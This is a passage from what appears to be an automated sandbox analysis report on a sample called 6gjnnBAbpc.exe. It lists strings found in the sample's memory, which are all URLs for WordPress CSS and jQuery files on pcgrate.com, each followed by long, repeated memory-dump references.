00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/favicon.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/the7-css/compatibility/wc-dt-custom.css?ver=899328ee298e
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/the7-css/css-vars.css?ver=899328ee298e
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/the7-css/custom.css?ver=899328ee298e
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/the7-css/media.css?ver=899328ee298e
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/the7-css/post-type-dynamic.css?ver=899328ee298e
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/css/dist/block-library/style.min.css?ver=5.8
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.0
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/core.min.js?ver=1.12.1
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/effect-blind.min.js?ver=1.12.1
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/effect-fold.min.js?ver=1.12.1
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 